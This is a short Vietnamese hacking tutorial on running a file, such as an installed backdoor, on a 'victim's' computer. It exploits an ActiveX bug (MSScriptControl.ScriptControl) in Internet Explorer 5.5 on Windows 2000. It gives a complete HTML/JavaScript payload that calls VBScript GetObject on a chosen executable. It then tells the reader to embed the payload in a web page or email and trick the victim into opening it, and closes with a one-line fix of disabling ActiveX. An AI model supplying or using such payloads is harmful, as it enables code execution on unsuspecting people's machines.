Chạy file trên máy của victim :

trang này đã được đọc lần

Giới thiệu :

• Bạn đã cài được backdoor vào victim hay muốn chạy 1 file nào đó trên máy của victim ?
• Trong khi visit website hay check mail thì bạn có thể chạy 1 file mà bạn biết  , ví dụ : notepad.exe ngay trên Browser
• Test trên IE 5.5 Windows 2000
• Bug này là bug của ActiveX object "MSScriptControl.ScriptControl" bạn có thể xem thêm nhiều điều ở trong : C:\Documents and Settings\USERNAME\Local Settings\Temporary Internet Files\Content.IE5\index.dat.

Tiến hành

• Chắc chắn rằng victim dùng IE 5.5 Windows 2000 !!:)
• Tạo một file .html có mã như sau :

  <html>
  <h2>
  Noi dung website
  </h2>
  <script>
  v=new ActiveXObject("MSScriptControl.ScriptControl.1");
  v.Language="VBScript";
  x=v.eval('GetObject("c:/ten_file_can_chay.exe(hay gi do')","htmlfile")');
  setTimeout("alert(x.body.outerHTML);",2000);
  </script>
  </html>

   

• Nhúng mã nguồn trên vào Website hay email, sau đó nhử cho victim kích hoạt
• Ðể khắc phục bạn cần bỏ ActiveX đí hay tốt nhất là không dùng IE nữa (ý kiến hay)